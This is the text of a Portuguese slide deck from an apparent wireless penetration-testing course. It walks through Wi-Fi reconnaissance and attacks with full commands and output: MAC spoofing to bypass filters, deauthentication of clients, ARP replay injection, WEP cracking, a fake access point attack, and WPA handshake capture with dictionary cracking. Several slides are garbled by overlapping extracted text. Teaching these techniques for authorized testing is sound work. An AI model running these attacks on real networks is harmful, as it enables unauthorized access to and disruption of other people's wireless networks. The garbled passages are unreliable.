Clavis Teste de Invasao Sem Fio EAD

Teste
de Invaso em
Redes Sem Fio
Nelson Murilo
Clavis Segurana da Informao
$ whoami
Consultor Infosec
2 livros publicados
Pentester
Investigador Forense
Incident Handler
Instrutor e Palestrante
Contatos
nmurilo@gmail.com
nelson.murilo
@nelsonmurilo
Modelo do Curso
Aulas ao vivo (on line)

Aulas gravadas para reviso
Ambientes para testes
Material complementar
Avaliao
Agenda
Introduo
Conceitos de redes Wi-Fi
Principais vulnerabilidades
Ferramentas atuais
Sondagem e mapeamento
Identificao do ambiente
Ataques
Finalizando
Introduo
Conceitos
Caractersticas
Redes sem fio
Wi-Fi
Bluetooth
Infravermelho
WiMax
RFID
Celular (GSM/TDMA/CDMA, etc.)
ZigBee (802.15.4)
UWB (802.15.3)
IEEE 802.11
Padres atuais:
802.11b 11Mb 2.4Ghz
802.11a 54Mb 5.1GHz
802.11g 54Mb 2.4Ghz
802.11i - Mecanismos de segurana
802.1x Mecanismos de autenticao, uso em
redes cabeadas e sem fio
802.11n Aumento da velocidade, 108Mb
nominais.
# dmesg | grep phy
[ 0.000000] BIOS-provided physical RAM map:
[ 84.913442] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[ 84.913969] Registered led device: rt2800usb-phy0::radio
[ 84.913999] Registered led device: rt2800usb-phy0::assoc
[ 84.914026] Registered led device: rt2800usb-phy0::quality
# iwconfig
lo no wireless extensions.
wlan4 IEEE 802.11bgn ESSID:off/any

Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
eth4 no wireless extensions.

Canais
Canais
Canais
Canais
Canais
$ iwlist wlan0 freq

wlan0 24 channels in total; available Channel 36 : 5.18 GHz
frequencies : Channel 40 : 5.2 GHz
Channel 01 : 2.412 GHz Channel 44 : 5.22 GHz

Ad-Hoc
Infraestrutura
Infraestrutura
((( Nome da rede )))

Infraestrutura
((( Nome da rede )))

Infraestrutura
Infraestrutura
Infraestrutura
Infraestrutura
Infraestrutura
Divulgao do nome da rede
# iwlist wlan0 scan | egrep "Address|ESSID"

[...]
Cell 05 - Address: 7C:4F:B5:E4:CC:80
ESSID:"GVT-CC81"
Cell 06 - Address: 00:07:40:4D:1A:5C
ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00"
Cell 07 - Address: 6C:2E:85:F3:0C:8B
ESSID:"GVT-0C87"


23:05:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:16.488612 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:17.629271 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
00:07:40:4D:1A:5C
09:15:42.216583 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:
00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown)
Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|
802.11]
09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown)

DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui
Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0
18.0 Mbit][|802.11]
09:15:42.218638 314us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:

00:21:29:65:b8:45 (oui Unknown) SA:00:07:40:4d:1a:5c (oui Unknown)
Probe Response (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] CH: 11[|802.11]
09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown)

DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown)
Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]
WEP
WPA
WPA-PSK (Pre-shared Key)
WPA - Enterprise
RADIUS
WPA - Enterprise
/etc/password
/etc/raddb/users
Oracle/MySQL/etc
Cer_cado Digital
RADIUS
Biometria
Conceitos iniciais
$ /sbin/ifcong wlan0
wlan0 Link encap:Ethernet HWaddr 00:21:29:65:b8:45
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Modo promiscuo
# tcpdump -vv -c 3 -i wlan0

tcpdump: listening on wlan0, link-type EN10MB (Ethernet), capture size 65535
bytes
14:00:37.291962 IP (tos 0x0, hl 64, id 0, oset 0, ags [DF], proto ICMP (1), length
84)
192.168.11.2 > air: ICMP echo request, id 30507, seq 9, length 64

14:00:37.292417 IP (tos 0x0, hl 64, id 8024, oset 0, ags [DF], proto UDP (17),
length 71)
192.168.11.2.49351 > air: [udp sum ok] 2302+ PTR? 1.11.168.192.in-addr.arpa.
(43)

14:00:37.294831 IP (tos 0x0, hl 255, id 49706, oset 0, ags [none], proto ICMP
(1), length
84) air > 192.168.11.2: ICMP echo reply, id 30507, seq 9, length 64
3 packets captured
Modo promiscuo
# iwcong wlan0
wlan0 IEEE 802.11bg ESSID:o/any
Retry long limit:7 RTS thr:o Fragment thr:o
Encryp_on key:o
Power Management:on
# iw wlan0 info
Interface wlan0
index 32
type managed
Modo Monitor
# iwconfig wlan0 mode monitor

# iw dev wlan0 interface add mon0 type monitor

Modo Monitor
# iwconfig mon0
mon0 IEEE 802.11bg Mode:Monitor Tx-Power=20 dBm
Power Management:on
# iw mon0 info
Interface mon0
index 35
type monitor

Modo monitor
# tcpdump -c 3 -i mon0 -vv

tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap
header), capture size 65535 bytes
14:22:52.234724 1.0 Mb/s 2412 MHz 11b -74dB signal antenna 1 [bit 14] 0us
Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 1,
PRIVACY[|802.11]
14:22:52.260469 1.0 Mb/s 2412 MHz 11b -48dB signal antenna 1 [bit 14] WEP
Encrypted 0us Data IV:5b5 Pad 20 KeyID 2
14:22:52.261938 54.0 Mb/s 2412 MHz 11g -18dB signal antenna 1 [bit 14] WEP
Encrypted 44us Data IV:4104 Pad 20 KeyID 0
3 packets captured
Seleo de canais
# iwconfig mon0 channel 11

# iwconfig mon0
mon0 IEEE 802.11bg Mode:Monitor Frequency:2.462
GHz Tx-Power=20 dBm
Power Management:on
Seleo de canais
# tcpdump -c 3 -i mon0 -vv

tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap
header),
capture size 65535 bytes
Beacon () [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11[|802.11]
Beacon (GVT-CC81) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[
|802.11]
Beacon (GVT-0C87) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[
|802.11]
3 packets captured
Identificao de APs
CH 5 ][ Elapsed: 0 s ][ 2012-03-07 14:39
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:25:9C:36:A0:9F -88 15 18 108 47 5 11e. OPN bsbca
BSSID STATION PWR Rate Lost Frames Probe
00:25:9C:36:A0:9F 00:0E:2E:EC:6B:05 -1 11 - 0 0 1
00:25:9C:36:A0:9F 00:0E:2E:45:F5:B3 -1 11 - 0 0 1
Identificao de APs
B E N C C IPH E R A UT H ESSID
XQ B e a c on s # D a ta , # /s CH M
BSSID PWR R
7 5 1 1 e . O P N bsbca
0 :9 F -8 8 1 5 18 108 4
00:25:9C:36:A
grep 00-25-9C /usr/local/etc/aircrack-ng/airodump-ng-oui.txt

00-25-9C (hex) Cisco-Linksys, LLC
Identificao de APs
Anlise do trfego
tshark -r Kismet-20120309-04-23-25-1.pcapdump
6007 334.636502 Apple_67:a1:ef -> Broadcast ARP 114 Gratuitous ARP for 192.168.1.104 (Request)
6448 358.804988 192.168.1.191 -> 239.255.255.250 SSDP 487 NOTIFY * HTTP/1.1
9739 547.951220 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
9740 547.953352 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
10144 572.216034 192.168.1.103 -> 224.0.0.251 MDNS 645 Standard query response TXT, cache flush PTR
Identificao de APs
Anlise do trfego
iwconfig wlan5 essid bsbca
iwconfig wlan5
wlan5 IEEE 802.11abgn ESSID:"bsbca"
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Filtro de MAC
Filtro de MAC
Filtro de MAC
Filtro de MAC
Filtro de MAC
Linux
# ifconfig ath0 hw ether 00:00:00:00:00:01
Mac OSX
# ifconfig en0 ether 00:00:00:00:00:01
FreeBSD
# ifconfig xl3 ether 00:00:00:00:00:01
OpenBSD/NetBSD
# wiconfig wi0 -m 00:00:00:00:00:01
Filtro de MAC
Wired Equivalent Privacy
Protocolo frgil
Quebra exige captura de grande nmero de pacotes (+5mil)
Ou por dicionrio
Vrias ferramentas disponveis

CH 11 ][ Elapsed: 0 s ][ 2012-02-20 11:06
00:07:40:4D:1A:5C -39 0 3 17 8 11 54 WEP WEP LABVIRUS
00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 -36 0 20 LABVIRUS

/usr/local/etc/kismet.conf
logtypes=pcapdump,gpsxml,netxml,nehxt,alert
gps=true
preferredchannels=1,6,11
allowplugins=true
$ ls -lh Kismet*
-rw-r--r-- 1 root root 8.0M 2012-02-20 14:04 Kismet-20120220-13-47-37-1.pcapdump
hhp://blog.kismetwireless.net/
Suite formada de vrios programas

Anlise de trfego
Quebra de chave WEP (vrios _pos de ataques)
Injeo de pacotes
Quebra de chave WPA(2)-PSK usando dicionrio
Criao de Access Point falso

Sequncia comum

Airmon-ng: Coloca a interface em modo monitor
Airodump-ng: Visualizao e captura de pacotes
Aircrack-ng: Quebra da chave WEP

# airmon-ng
Interface Chipset Driver
wlan5 Ralink RT2870/3070 rt2800usb - [phy48]

# airmon-ng
wlan5 Ralink RT2870/3070 rt2800usb -

[phy48]
# airmon-ng start wlan5
wlan2 Realtek RTL8187L rtl8187 - [phy51]

(monitor mode enabled on mon0)
# airmon-ng
wlan5 Ralink RT2870/3070 rt2800usb - [phy48]
# airmon-ng start wlan5


# airmon-ng start wlan5 11

Airodump-ng
# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,

ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.
Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
Airodump-ng
# airodump-ng mon0
CH 11 ][ Elapsed: 4 s ][ 2012-02-21 17:01
00:07:40:4D:1A:5C 00:21:29:65:B8:45 -127 0 -1 3 9 LABVIRUS

Aircrack-ng
$ aircrack-ng labvirus-01.pcap

[00:00:05] Tested 633 keys (got 46103 IVs)

KB depth byte(vote)
0 2/ 4 14(55552) 13(54528) 3C(53504) 98(53504) 24(53248)
1 2/ 1 DE(54784) 92(54528) 06(52992) 7D(52736) 02(52480)
2 1/ 3 82(56576) 18(54272) 45(53760) CD(53504) FC(53248)
3 1/ 3 09(57600) 08(55808) 41(55040) C9(54016) 8E(52992)
4 51/ 4 A1(48640) 83(48384) 86(48384) 99(48384) B2(48384)

KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX ] (ASCII: naoxxxxxxxx )
Decrypted correctly: 100%
Aireplay-ng
# aireplay-ng --test mon0

17:33:50 Trying broadcast probe requests...
17:33:50 Injection is working!
17:33:52 Found 1 AP
17:33:52 Trying directed probe requests...

17:33:52 00:25:9C:36:0A:EF - channel: 11 LABVIRUS'
17:33:52 Ping (min/avg/max): 1.671ms/6.230ms/11.234ms Power: -28.73
17:33:52 30/30: 100%
Aireplay-ng
# aireplay-ng --arpreplay h mac_cliente e ESSID interface
# arp an
#
in g - c 1 1 9 2 .1 68.11.1 4) b y te s of data.
#p .1 ) 5 6 (8
1 9 2 .1 68 .1 1 .1 (192.168.11 tt l= 2 5 5 ti m e = 5 4.9 ms
PING .11 .1 : icmp_seq=1
1 9 2 .1 6 8
64 bytes from
1 .1 p in g s ta ti s tics --- time 0ms
--- 192.168.1 % p a c k e t los s ,
tr a n s m it ted , 1 received, 0 7 3 / 0 .0 00 ms
p a c k ets 7 3 / 5 4 .9
1
g / m a x /m d e v = 54.973/54.9
rtt min/av
8 [ether] on wlan0
# arp an 7 :4 0 :3 5 :a 1 :1
at 00:0
(192.168.11.1)
Aireplay-ng
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40
00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS

Aireplay-ng
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0
BSSID
The interfaceSTATION PWR Rate doesn't
MAC (00:26:5A:74:15:28) Lost match
FramestheProbe
specified MAC (-h).
ifconfig mon0 hw ether 00:21:29:65:B8:45
00:07:40:4D:1A:5C
17:44:10 Waiting00:21:29:65:B8:45 -14 36LABVIRUS)
for beacon frame (ESSID: -54 1 on 128 LABVIRUS
channel 11
Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS".
Saving ARP requests in replay_arp-0221-174410.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)
Aireplay-ng
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0
BSSID
The interfaceSTATION PWR Rate doesn't
MAC (00:26:5A:74:15:28) Lost match
FramestheProbe
specified MAC (-h).
ifconfig mon0 hw ether 00:21:29:65:B8:45
00:07:40:4D:1A:5C
17:44:10 CHWaiting 00:21:29:65:B8:45
11 ][ Elapsed: 48 sframe
for beacon -14 36LABVIRUS)
][ 2012-02-21
(ESSID: -54 ][1Decloak:
17:44 on 128 LABVIRUS
00:07:40:4D:1A:5C
channel 11
Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS".
Saving ARP BSSID
requests inPWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
replay_arp-0221-174410.cap
You should also start airodump-ng to capture replies.
Notice: got 00:07:40:4D:1A:5C -38packet.
a deauth/disassoc 100 Is 353 14438
the source MAC652 11 54 ?WEP WEP
associated LABVIRUS
Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)
00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 - 1 4042 28810 LABVIRUS

Aireplay-ng
# airmon-ng start wlan5 11


# airodump-ng -c 11 mon0
Aireplay-ng
Esperar uma nova conexo
Forar uma desconexo

aireplay-ng --deauth 100 h MAC_CLIENTE e ESSID mon0
ivstools-ng
Aircrack-ng 1.1 r2076

KB depth byte(vote)
0 19/ 34 F7(3840) 05(3584) 1A(3584) 2B(3584) 32(3584)
1 43/ 1 E7(3328) 01(3072) 02(3072) 04(3072) 0B(3072)
2 42/ 2 BB(3328) 15(3072) 21(3072) 28(3072) 34(3072)
3 0/ 7 CB(5888) A7(4352) 0B(4096) 5E(4096) 93(4096)
4 8/ 47 FF(4096) 1B(3840) 2E(3840) 44(3840) 83(3840)
Failed. Next try with 5000 IVs.

ivstools-ng

KB depth byte(vote)
0 4/ 7 FE(9984) 18(9728) 29(9728) 7F(9728) B4(9728) F6(9728)
1 23/ 24 B5(8960) 27(8704) 37(8704) 4A(8704) 51(8704) 53(8704) 28)
2 44/ 2 FA(8448) 00(8192) 26(8192) 2B(8192) 3D(8192) 4C(8192) 8)
3 19/ 3 93(9216) 0B(8960) 11(8960) 12(8960) 1D(8960) 3F(8960) 84)
4 19/ 20 BE(8960) 0A(8704) 11(8704) 12(8704) 3E(8704) 52(8704) 8)
Failed. Next try with 10000 IVs.

ivstools-ng
for i in poucosivs-0*; do ivstools --convert $i $i.ivs ; done

Opening poucosivs-01.cap
Creating poucosivs-01.cap.ivs
Read 18995 packets.
Written 2448 IVs.
Read 551433 packets.
Written 30547 IVs.
Written 13092 IVs.
ivstools-ng
ivstools --merge *.ivs poucostotal.ivs

Creating poucostotal.ivs
Opening poucosivs-01.cap.ivs
334818 bytes written
ivstools-ng
# aircrack-ng poucosivs-01.cap poucosivs-02.cap poucosivs-03.cap poucosivs-04.cap

# BSSID ESSID Encryption
1 00:07:40:4D:1A:5C LABVIRUS WEP (40296 IVs)

# tcpdump -vvv -n -r labvirus-01.cap
16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c
16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e
16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.251394
# airdecap-ng104us Clear-To-Send RA:c8:bc:c8:20:38:5c
-w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap
16:24:29.251398
Total number0us Acknowledgment
of packets read RA:c8:bc:c8:20:38:5c
298278
16:24:29.251910
of WEP data packets RA:00:1c:b3:af:ae:1e
162412
16:24:29.259072
Total number90us Request-To-Send
of WPA data packets TA:c8:bc:c8:20:38:5c
0
16:24:29.259080 46us Clear-To-Send
Number of plaintext data packetsRA:c8:bc:c8:20:38:5c
0
16:24:29.259586 90us Request-To-Send
Number of decrypted WEP packets TA:c8:bc:c8:20:38:5c
108781
16:24:29.259594 46us Clear-To-Send
Number of corrupted WEP packetsRA:c8:bc:c8:20:38:5c
0
Number of decrypted WPA packets TA:c8:bc:c8:20:38:5c
0
16:24:29.251394
# airdecap-ng104us Clear-To-Send RA:c8:bc:c8:20:38:5c
-w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap
16:24:29.251398
of packets read RA:c8:bc:c8:20:38:5c
298278
16:24:43.166932
16:24:29.251910 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
number0us Acknowledgment
Total 16:24:43.170518
of WEP data packets RA:00:1c:b3:af:ae:1e
162412
IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 335
16:24:29.259072
Total number90us Request-To-Send
of WPA data packets TA:c8:bc:c8:20:38:5c
0
16:24:43.173590
16:24:29.259080 IP 192.168.11.1.1900
46us Clear-To-Send > 239.255.255.250.1900: UDP, length 327
RA:c8:bc:c8:20:38:5c
Number of plaintext
16:24:43.176662 data packets 0
IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
Number of decrypted WEP packets TA:c8:bc:c8:20:38:5c
108781
16:24:43.181784
16:24:29.259594 IP 192.168.11.1.1900
46us Clear-To-Send > 239.255.255.250.1900: UDP, length 311
RA:c8:bc:c8:20:38:5c
Number of corrupted
16:24:43.187416 WEP packets 0
IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 343
16:24:29.396292
Number of 90us Request-To-Send
decrypted WPA packets TA:c8:bc:c8:20:38:5c
0
16:24:43.190486 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.193558 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:24:43.197654 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 337
16:24:43.201748 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 325
16:24:43.204822 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:25:05.057281 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:2
9:65:b8:45 (oui Unknown), length 300
16:25:05.060444 IP 192.168.11.1.bootps > 192.168.11.2.bootpc: BOOTP/DHCP, Reply, length 300
16:25:05.075290 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:2
9:65:b8:45 (oui Unknown), length 300
CH 11 ][ Elapsed: 4 s ][ 2012-02-27 21:14

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

2E:74:C2:BA:A5:8A -87 2 0 0 3 54e WPA2 CCMP PSK iPhone de Marcelo
00:25:9C:36:0A:EF -45 3 0 0 1 54 WPA2 CCMP PSK Homenet54


(not associated) 00:1B:77:7C:2C:A7 -86 0 - 1 68 8 Notebook
(not associated) 00:21:29:65:B8:45 -47 0 - 1 7 2 LABVIRUS
CH 4 ][ Elapsed: 28 s ][ 2012-02-28 07:59
00:26:CB:11:5F:30 -64 16 0 0 11 54e. WPA2 CCMP MGT 88200W

00:1C:10:AE:B6:8F -68 20 0 0 6 54 OPN linksys
74:EA:3A:CF:13:7C -70 15 2 0 11 54 . WPA2 CCMP PSK LABVIRUS
00:E0:FC:4D:27:49 -79 0 0 0 11 54 WPA2 TKIP PSK Pessoal
(not associated) DC:2B:61:33:2B:6C -53 0 - 1 0 12 Boingo Hotspot,EuroYouthHotel,hostalparis3,RYANS-PARADIS-W

# airbase-ng -N --essid LABVIRUS -c 1 -v -W 1 mon0

09:57:07 Created tap interface at0
09:57:07 Trying to set MTU on at0 to 1500
09:57:07 Access Point with BSSID 00:21:29:65:B8:45 started.
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS"
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS
09:57:10 Got an auth request from E0:F8:47:C3:30:14 (shared key)
09:57:10 Broken SKA: E0:F8:47:C3:30:14 (expected: 151, got 32 bytes)
09:57:10 SKA from E0:F8:47:C3:30:14
09:57:10 Client E0:F8:47:C3:30:14 associated (WEP) to ESSID: "LABVIRUS"
09:57:10 Ignored IPv6 packet.
09:57:10 Starting Hirte attack against E0:F8:47:C3:30:14 at 100 pps.
09:57:10 Added ARP packet to cfrag buffer.

# airodump-ng --bssid 00:21:29:65:B8:45 -w cafe-latte -c 1 mon0
# aircrack-ng cafe-latte-01.cap

KB depth byte(vote)
0 0/ 1 6E(56064) 15(45824) 3D(45312) AA(44800) 4A(44288)
1 0/ 9 61(53760) 44(46336) 98(45568) 0E(44800) C4(44800)
2 33/ 2 AE(41728) 18(41472) 6C(41472) 6F(41472) A1(41472)
3 7/ 3 F0(43776) 70(43264) B4(43264) 62(43008) 50(42752)
4 0/ 2 B8(56576) CD(46848) 94(46080) C9(45056) 3F(44800)
KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX:XX] (ASCII: naoxxxxxxxxxxx )

Decrypted correctly: 100%

AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
Migration WPA-WEP
Migration WPA-WEP
Migration WPA-WEP
Migration WPA-WEP
Migration WPA-WEP
WPA
CH 5 ][ Elapsed: 3 mins ][ 2012-02-22 05:45
00:26:CB:11:5F:30 -64 66 1 0 11 54e. WPA2 CCMP MGT 88200Wireless-d

00:26:CB:B9:23:40 -77 68 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BD:90 -81 66 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
94:0C:6D:BB:2C:94 -89 23 0 0 6 11 . WPA2 CCMP PSK Testeee
00:14:D1:C7:BD:00 -90 51 7 0 11 54e OPN AER 5 andar
00:26:CB:B9:24:C0 -82 17 0 0 1 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BA:00 -90 9 0 0 11 54e. WPA2 CCMP MGT 88200Wireless-d
airodump-ng -w labvirus_wpa -c 11 --bssid 00:07:40:4D:1a:5c mon0
CH 11 ][ Elapsed: 12 s ][ 2012-03-01 14:06
00:07:40:4D:1A:5C -45 61 76 25 1 11 54 WPA CCMP PSK LABVIRUS
00:07:40:4D:1A:5C 00:26:5A:74:15:28 -25 54 - 5 8 26

aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
1 00:07:40:4D:1A:5C LABVIRUS WPA (0 handshake)

aircrack-ng labvirus_wpa-01.cap
Read 698 packets.
1 00:07:40:4D:1A:5C LABVIRUS WPA (1 handshake)
Choosing first network as target.
Please specify a dictionary (option -w).
tshark -r dlink-01.cap -R eapol
D -Lin k_ 74 :1 5: 28 EA PO L 131 Ke y (msg 1/4)
e ->
39965 377.079356 D-Link_50:2f:2 50 :2 f:2 e EA PO L 16 0 Ke y (m sg 2/4)
28 -> D -Lin k_
39968 377.086048 D-Link_74:15: :1 5: 28 EA PO L 18 7 Ke y (m sg 3/4)
e -> D-Lin k_ 74
39969 377.089080 D-Link_50:2f:2 50 :2 f:2 e EA PO L 13 6 Ke y (m sg 4/ 4)
97 1 37 7. 10 44 80 D-L in k_ 74 :1 5: 28 -> D-Link_
39
arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22 Wai_ng for beacon frame (ESSID: dlink) on channel 6
Found BSSID "00:1B:11:50:2F:2E" to given ESSID "dlink".
08:49:22 Sending 64 directed DeAuth. STMAC: [00:26:5A:74:15:28] [ 0|63
ACKs]
ACKs] wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
ACKs] wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
aircrack-ng dlink-01.cap
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
Opening dlink-01.cap
Read 60093 packets.
1 00:1B:11:50:2F:2E dlink WPA (1 handshake)

time aircrack-ng w popular_ptBR.dic dlink-01.cap

Aircrack-ng 1.1
[00:01:09] 88192 keys tested (1274.66 k/s)

KEY FOUND! [ pxxxxxxxxxxxxxxxx ]
Master Key : E3 C5 0B 41 F1 8B 96 00 4B E1 AF F8 D9 67 0F 1F
D4 63 BA F0 0B 8A 2C 55 5F DD 5F 58 21 03 CE E4
Transient Key : 00 C8 D3 4D C1 7A 8B D5 57 3C FB 5B 86 D5 56 09
57 FA 29 9E 1E 2D A3 27 C1 19 07 4F 76 0C 25 57
A8 E8 F0 69 14 DE F7 18 FE EB 41 55 A4 17 87 CC
01 F9 F9 A4 87 95 C7 1C 90 BD 12 B4 CC 63 9A C3
EAPOL HMAC : 17 4A DB 11 5A AE 52 D6 CF E6 E4 2A 96 1D FB D2
real 1m9.538s
user 4m18.786s
sys 0m0.629s
time genpmk -f 234k_pt-br_popular.dic -d dlink234.pmk -s dlink
[]
109216 passphrases tested in 542.98 seconds: 201.14 passphrases/second
real 9m2.988s
user 9m2.468s
sys 0m0.414s
Cowpatty
time genpmk f popular.dic -d dlink234.pmk -s dlink
[]
real 9m2.988s
user 9m2.468s
_me pyrit I popular.dic -o dlink.pmk -e dlink passthrough
sys 0m0.414s
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg hhp://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Computed 109216 PMKs total; 1865 PMKs per secondd

real 1m20.753s
user 5m2.437s
sys 0m0.753s

Cowpatty
cowpahy d dlinkpop.pmk -s dlink -r dlink-01.cap
cowpahy 4.6 - WPA-PSK dic_onary ahack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Star_ng dic_onary ahack. Please be pa_ent.
key no. 10000: 22222222
key no. 20000: 93833104
key no. 30000: And48560
key no. 40000: Cib00043
key no. 50000: enqetm17
key no. 60000: hamdan00
key no. 70000: liberta10
key no. 80000: Mil08187

The PSK is pxxxxxxxxxxxxxxxxxx".

Pyrit
time pyrit -r dlink-01.cap I t-br_popular.dic attack_passthrough

Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
Parsing file 'dlink-01.cap' (1/1)...

Parsed 19 packets (19 802.11-packets), got 1 AP(s)
Picked AccessPoint 00:1b:11:50:2f:2e ('dlink') automatically.

Tried 109216 PMKs so far; 1870 PMKs per second.
The password is pxxxxxxxxxxxxx'.
real 1m21.027s
user 5m5.224s
sys 0m0.724s
Pyrit
pyrit benchmark
Running benchmark (1239.9 PMKs/s)... \
Computed 1239.93 PMKs/s total.

